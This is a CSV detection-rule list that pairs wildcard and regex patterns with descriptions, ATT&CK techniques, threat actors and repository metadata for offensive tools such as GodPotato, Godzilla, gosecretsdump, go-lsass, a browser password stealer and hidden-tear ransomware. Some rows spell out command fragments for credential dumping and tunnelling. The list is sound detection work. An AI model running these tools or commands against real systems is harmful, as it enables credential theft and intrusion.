"*GodPotato-NET4.exe*",".{0,1000}GodPotato\-NET4\.exe.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1134.001 - T1068  - T1055 - T1546.015","TA0004 - TA0006 - TA0011","N/A","N/A","Privilege Escalation","https://github.com/weaselsec/GodPotato-Aggressor-Script","1","1","N/A","N/A","10","1","85","9","2024-01-02T00:22:03Z","2024-01-02T00:02:54Z","46567"
"*GodPotatoUnmarshalTrigger.cs*",".{0,1000}GodPotatoUnmarshalTrigger\.cs.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1134.001 - T1068  - T1055 - T1546.015","TA0004 - TA0006 - TA0011","Ghost Ransomware","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","1","N/A","N/A","10","10","1938","236","2023-11-24T19:22:31Z","2022-12-23T14:37:00Z","46568"
"*Godzilla-1.0.jar*",".{0,1000}Godzilla\-1\.0\.jar.{0,1000}","offensive_tool_keyword","Godzilla","Webshell Manager Tool that provide request proxy, server info, RCE shell, terminal execution, memory shell, port forwarding, and MSF bind/reverse shell capabilities.","T1100 - T1018 - T1059 - T1090 - T1021 - T1205 - T1105 - T1568","TA0001 - TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/BeichenDream/Godzilla","1","1","N/A","N/A","10","10","4096","551","2024-07-17T07:56:35Z","2020-08-17T17:27:56Z","46569"
"*go-external-c2*",".{0,1000}go\-external\-c2.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","N/A","10","10","443","95","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z","46570"
"*GoFetchAD/GoFetch*",".{0,1000}GoFetchAD\/GoFetch.{0,1000}","offensive_tool_keyword","GoFetch","GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application.","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","Dispossessor","Discovery","https://github.com/GoFetchAD/GoFetch","1","1","N/A","N/A","10","7","633","99","2017-06-20T14:15:10Z","2017-04-11T10:45:23Z","46571"
"*gohaleygoandhackawaythegibson*",".{0,1000}gohaleygoandhackawaythegibson.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","46574"
"*golang_c2-master*",".{0,1000}golang_c2\-master.{0,1000}","offensive_tool_keyword","golang_c2","C2 written in Go for red teams aka gorfice2k","T1071 - T1021  -  T1090","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/m00zh33/golang_c2","1","1","N/A","N/A","10","10","6","8","2019-03-18T00:46:41Z","2019-03-19T02:39:59Z","46575"
"*golden_ticket.py*",".{0,1000}golden_ticket\.py.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","N/A","10","10","472","100","2025-04-10T19:47:06Z","2020-11-09T08:05:16Z","46576"
"*golden_ticket.rb*",".{0,1000}golden_ticket\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","46577"
"*goldencopy * --password * --stealth --krbtgt 060ee2d06c5648e60a9ed916c9221ad19d90e5fb7b1cccf9d51f540fe991ada1 *",".{0,1000}goldencopy\s.{0,1000}\s\-\-password\s.{0,1000}\s\-\-stealth\s\-\-krbtgt\s060ee2d06c5648e60a9ed916c9221ad19d90e5fb7b1cccf9d51f540fe991ada1\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","46578"
"*GoldenGMSA.exe*",".{0,1000}GoldenGMSA\.exe.{0,1000}","offensive_tool_keyword","GoldenGMSA","GolenGMSA tool for working with GMSA passwords","T1003.004 - T1078.003 - T1059.006","TA0006 - TA0004 - TA0002","N/A","N/A","Credential Access","https://github.com/Semperis/GoldenGMSA","1","1","N/A","N/A","7","2","144","22","2024-04-11T07:51:57Z","2022-02-03T10:32:05Z","46579"
"*GoldenGMSA-main*",".{0,1000}GoldenGMSA\-main.{0,1000}","offensive_tool_keyword","GoldenGMSA","GolenGMSA tool for working with GMSA passwords","T1003.004 - T1078.003 - T1059.006","TA0006 - TA0004 - TA0002","N/A","N/A","Credential Access","https://github.com/Semperis/GoldenGMSA","1","1","N/A","N/A","7","2","144","22","2024-04-11T07:51:57Z","2022-02-03T10:32:05Z","46580"
"*goldenPac.py*",".{0,1000}goldenPac\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","46581"
"*goliate/hidden-tear*",".{0,1000}goliate\/hidden\-tear.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","1","N/A","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","46582"
"*go-lsass --host *",".{0,1000}go\-lsass\s\-\-host\s.{0,1000}","offensive_tool_keyword","go-lsass","dumping LSASS process remotely","T1003 - T1055 - T1021.005","TA0006 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/jfjallid/go-lsass","1","0","#linux","N/A","9","1","38","5","2024-07-27T10:35:12Z","2023-11-30T18:45:51Z","46583"
"*goMatrixC2.go*",".{0,1000}goMatrixC2\.go.{0,1000}","offensive_tool_keyword","goMatrixC2","C2 leveraging Matrix/Element Messaging Platform as Backend to control Implants in goLang.","T1090 - T1027 - T1071","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/n1k7l4i/goMatrixC2","1","1","N/A","N/A","10","","N/A","","","","46584"
"*goMatrixC2-main*",".{0,1000}goMatrixC2\-main.{0,1000}","offensive_tool_keyword","goMatrixC2","C2 leveraging Matrix/Element Messaging Platform as Backend to control Implants in goLang.","T1090 - T1027 - T1071","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/n1k7l4i/goMatrixC2","1","1","N/A","N/A","10","","N/A","","","","46585"
"*google_drive_doubledrive.exe*",".{0,1000}google_drive_doubledrive\.exe.{0,1000}","offensive_tool_keyword","DoubleDrive","A fully-undetectable ransomware that utilizes OneDrive & Google Drive to encrypt target local files","T1486 - T1562.001 - T1213 - T1070.004 - T1070.006 - T1105","TA0040 - TA0009 - TA0011 - TA0005","N/A","N/A","Ransomware","https://github.com/SafeBreach-Labs/DoubleDrive","1","1","N/A","N/A","10","2","124","14","2024-05-28T16:25:59Z","2023-05-23T13:17:38Z","46588"
"*google_drive_ransomware.py*",".{0,1000}google_drive_ransomware\.py.{0,1000}","offensive_tool_keyword","DoubleDrive","A fully-undetectable ransomware that utilizes OneDrive & Google Drive to encrypt target local files","T1486 - T1562.001 - T1213 - T1070.004 - T1070.006 - T1105","TA0040 - TA0009 - TA0011 - TA0005","N/A","N/A","Ransomware","https://github.com/SafeBreach-Labs/DoubleDrive","1","1","N/A","N/A","10","2","124","14","2024-05-28T16:25:59Z","2023-05-23T13:17:38Z","46589"
"*google-chrome/cookies.txt*",".{0,1000}google\-chrome\/cookies\.txt.{0,1000}","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","N/A","10","5","423","62","2024-07-12T10:30:42Z","2020-09-15T09:23:56Z","46590"
"*google-chrome/credit_cards.txt*",".{0,1000}google\-chrome\/credit_cards\.txt.{0,1000}","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","N/A","10","5","423","62","2024-07-12T10:30:42Z","2020-09-15T09:23:56Z","46591"
"*google-chrome/history.txt*",".{0,1000}google\-chrome\/history\.txt.{0,1000}","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","N/A","10","5","423","62","2024-07-12T10:30:42Z","2020-09-15T09:23:56Z","46592"
"*google-chrome/login_data.txt*",".{0,1000}google\-chrome\/login_data\.txt.{0,1000}","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","N/A","10","5","423","62","2024-07-12T10:30:42Z","2020-09-15T09:23:56Z","46593"
"*google-chrome\cookies.txt*",".{0,1000}google\-chrome\\cookies\.txt.{0,1000}","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","N/A","10","5","423","62","2024-07-12T10:30:42Z","2020-09-15T09:23:56Z","46594"
"*google-chrome\credit_cards.txt*",".{0,1000}google\-chrome\\credit_cards\.txt.{0,1000}","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","N/A","10","5","423","62","2024-07-12T10:30:42Z","2020-09-15T09:23:56Z","46595"
"*google-chrome\history.txt*",".{0,1000}google\-chrome\\history\.txt.{0,1000}","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","N/A","10","5","423","62","2024-07-12T10:30:42Z","2020-09-15T09:23:56Z","46596"
"*google-chrome\login_data.txt*",".{0,1000}google\-chrome\\login_data\.txt.{0,1000}","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","N/A","10","5","423","62","2024-07-12T10:30:42Z","2020-09-15T09:23:56Z","46597"
"*googlechromeauto.serveirc.com*",".{0,1000}googlechromeauto\.serveirc\.com.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","1","N/A","N/A","10","10","606","145","2024-10-29T16:56:39Z","2016-06-09T10:49:54Z","46598"
"*GoogleChromeAutoLaunch_9921366102WEAD21312ESAD31312*",".{0,1000}GoogleChromeAutoLaunch_9921366102WEAD21312ESAD31312.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","#registry","registry value","10","10","606","145","2024-10-29T16:56:39Z","2016-06-09T10:49:54Z","46599"
"*google-get-pdf-metadata *",".{0,1000}google\-get\-pdf\-metadata\s.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","46601"
"*google-get-rootdomains *",".{0,1000}google\-get\-rootdomains\s.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","46602"
"*goPassGen-master*",".{0,1000}goPassGen\-master.{0,1000}","offensive_tool_keyword","goPassGen","Easily-guessable Password Generator for Password Spray Attack","T1110 - T1110.003","TA0006 ","N/A","N/A","Exploitation tool","https://github.com/bigb0sss/goPassGen","1","1","N/A","N/A","8","1","21","1","2020-06-04T23:13:44Z","2020-06-04T22:33:37Z","46603"
"*gopherus --exploit mysql*",".{0,1000}gopherus\s\-\-exploit\smysql.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","46604"
"*gophish*phish.go*",".{0,1000}gophish.{0,1000}phish\.go.{0,1000}","offensive_tool_keyword","gophish","Gophish is an open-source phishing toolkit designed for businesses and penetration testers. It provides the ability to quickly and easily setup and execute phishing engagements and security awareness training.","T1566 - T1598","TA0008 - TA0009","N/A","Black Basta","Phishing","https://github.com/gophish/gophish","1","1","N/A","N/A","10","10","12483","2528","2024-09-23T04:24:43Z","2013-11-18T23:26:43Z","46605"
"*gophish.go*",".{0,1000}gophish\.go.{0,1000}","offensive_tool_keyword","gophish","Open-Source Phishing Toolkit","T1566-001 - T1566-002 - T1566-003 - T1056-001 - T1113 - T1567-001","TA0002 - TA0003","N/A","Black Basta","Phishing","https://github.com/gophish/gophish","1","1","N/A","N/A","10","10","12483","2528","2024-09-23T04:24:43Z","2013-11-18T23:26:43Z","46606"
"*gophish/gophish*",".{0,1000}gophish\/gophish.{0,1000}","offensive_tool_keyword","gophish","Gophish is an open-source phishing toolkit designed for businesses and penetration testers. It provides the ability to quickly and easily setup and execute phishing engagements and security awareness training.","T1566 - T1598","TA0008 - TA0009","N/A","Black Basta","Phishing","https://github.com/gophish/gophish","1","1","N/A","N/A","10","10","12483","2528","2024-09-23T04:24:43Z","2013-11-18T23:26:43Z","46607"
"*gophish-send-mail.py*",".{0,1000}gophish\-send\-mail\.py.{0,1000}","offensive_tool_keyword","phishing-HTML-linter","Phishing and Social-Engineering related scripts","T1566.001 - T1056.001","TA0040 - TA0001","N/A","N/A","Phishing","https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/phishing","1","1","N/A","N/A","10","10","2689","527","2023-06-27T19:16:49Z","2018-02-02T21:24:03Z","46608"
"*GoRelayServer.dll*",".{0,1000}GoRelayServer\.dll.{0,1000}","offensive_tool_keyword","DavRelayUp","DavRelayUp - a universal no-fix local privilege escalation in domain-joined windows workstations where LDAP signing is not enforced","T1078 - T1078.004 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/ShorSec/DavRelayUp","1","1","N/A","N/A","9","6","542","81","2023-06-05T09:17:06Z","2023-06-05T07:49:39Z","46609"
"*gorsair -t *",".{0,1000}gorsair\s\-t\s.{0,1000}","offensive_tool_keyword","Gorsair","Gorsair hacks its way into remote docker containers that expose their APIs","T1552","TA0006","N/A","N/A","Exploitation tool","https://github.com/Ullaakut/Gorsair","1","0","N/A","N/A","N/A","9","851","70","2023-12-19T18:44:32Z","2018-08-02T16:49:14Z","46610"
"*go-secdump -*",".{0,1000}go\-secdump\s\-.{0,1000}","offensive_tool_keyword","go-secdump","Tool to remotely dump secrets from the Windows registry","T1003.002 - T1012 - T1059.003","TA0006 - TA0003 - TA0002","N/A","N/A","Credential Access","https://github.com/jfjallid/go-secdump","1","0","N/A","N/A","10","5","457","51","2025-02-21T19:16:11Z","2023-02-23T17:02:50Z","46611"
"*go-secdump.exe*",".{0,1000}go\-secdump\.exe.{0,1000}","offensive_tool_keyword","go-secdump","Tool to remotely dump secrets from the Windows registry","T1003.002 - T1012 - T1059.003","TA0006 - TA0003 - TA0002","N/A","N/A","Credential Access","https://github.com/jfjallid/go-secdump","1","1","N/A","N/A","10","5","457","51","2025-02-21T19:16:11Z","2023-02-23T17:02:50Z","46612"
"*go-secdump-main*",".{0,1000}go\-secdump\-main.{0,1000}","offensive_tool_keyword","go-secdump","Tool to remotely dump secrets from the Windows registry","T1003.002 - T1012 - T1059.003","TA0006 - TA0003 - TA0002","N/A","N/A","Credential Access","https://github.com/jfjallid/go-secdump","1","1","N/A","N/A","10","5","457","51","2025-02-21T19:16:11Z","2023-02-23T17:02:50Z","46613"
"*gosecretsdump -ntds *-system *",".{0,1000}gosecretsdump\s\-ntds\s.{0,1000}\-system\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","46614"
"*gosecretsdump v* (@C__Sto*",".{0,1000}gosecretsdump\sv.{0,1000}\s\(\@C__Sto.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","Lockbit - Black Basta","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","N/A","10","4","391","50","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z","46615"
"*gosecretsdump/cmd*",".{0,1000}gosecretsdump\/cmd.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","Lockbit - Black Basta","Credential Access","https://github.com/C-Sto/gosecretsdump","1","1","N/A","N/A","10","4","391","50","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z","46616"
"*gosecretsdump_win*.exe*",".{0,1000}gosecretsdump_win.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","Lockbit - Black Basta","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","N/A","10","4","391","50","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z","46617"
"*gosecure/pyrdp*",".{0,1000}gosecure\/pyrdp.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","N/A","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","46618"
"*GoSecure/pyrdp*",".{0,1000}GoSecure\/pyrdp.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","N/A","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","46619"
"*go-shellcode.py*",".{0,1000}go\-shellcode\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","bypassAV cobaltstrike shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/jas502n/bypassAV-1","1","1","N/A","N/A","10","10","17","9","2021-03-04T01:51:14Z","2021-03-03T11:33:38Z","46620"
"*goShellCodeByPassVT*",".{0,1000}goShellCodeByPassVT.{0,1000}","offensive_tool_keyword","cobaltstrike","generate shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/fcre1938/goShellCodeByPassVT","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","46621"
"*goshs -b * --ssl --self-signed -p * -d /workspace*",".{0,1000}goshs\s\-b\s.{0,1000}\s\-\-ssl\s\-\-self\-signed\s\-p\s.{0,1000}\s\-d\s\/workspace.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","46622"
"*gost -L=:* -F=*:*",".{0,1000}gost\s\-L\=\:.{0,1000}\s\-F\=.{0,1000}\:.{0,1000}","offensive_tool_keyword","gost","Ransomware operators actively use Gost capabilities (<https://github.com/ginuerzh/gost>) in order to communicate with their remote server. using the command below. To hide the software in plain sight. they rename it to `System.exe` or `update.exe`.","T1568 - T1001 - T1027 - T1041","TA0002 - TA0011","N/A","Dispossessor - EMBER BEAR","Data Exfiltration","https://github.com/ginuerzh/gost","1","0","N/A","N/A","N/A","10","16646","2539","2024-12-31T13:08:51Z","2015-03-20T09:45:08Z","46624"
"*gost -L=admin:*@localhost:*",".{0,1000}gost\s\-L\=admin\:.{0,1000}\@localhost\:.{0,1000}","offensive_tool_keyword","gost","Ransomware operators actively use Gost capabilities (<https://github.com/ginuerzh/gost>) in order to communicate with their remote server. using the command below. To hide the software in plain sight. they rename it to `System.exe` or `update.exe`.","T1568 - T1001 - T1027 - T1041","TA0002 - TA0011","N/A","Dispossessor - EMBER BEAR","Data Exfiltration","https://github.com/ginuerzh/gost","1","0","N/A","N/A","N/A","10","16646","2539","2024-12-31T13:08:51Z","2015-03-20T09:45:08Z","46625"
"*gost -L=forward+ssh://:*",".{0,1000}gost\s\-L\=forward\+ssh\:\/\/\:.{0,1000}","offensive_tool_keyword","gost","Ransomware operators actively use Gost capabilities (<https://github.com/ginuerzh/gost>) in order to communicate with their remote server. using the command below. To hide the software in plain sight. they rename it to `System.exe` or `update.exe`.","T1568 - T1001 - T1027 - T1041","TA0002 - TA0011","N/A","Dispossessor - EMBER BEAR","Data Exfiltration","https://github.com/ginuerzh/gost","1","0","N/A","N/A","N/A","10","16646","2539","2024-12-31T13:08:51Z","2015-03-20T09:45:08Z","46626"
"*gost -L=rtcp://*",".{0,1000}gost\s\-L\=rtcp\:\/\/.{0,1000}","offensive_tool_keyword","gost","Ransomware operators actively use Gost capabilities (<https://github.com/ginuerzh/gost>) in order to communicate with their remote server. using the command below. To hide the software in plain sight. they rename it to `System.exe` or `update.exe`.","T1568 - T1001 - T1027 - T1041","TA0002 - TA0011","N/A","Dispossessor - EMBER BEAR","Data Exfiltration","https://github.com/ginuerzh/gost","1","0","N/A","N/A","N/A","10","16646","2539","2024-12-31T13:08:51Z","2015-03-20T09:45:08Z","46627"
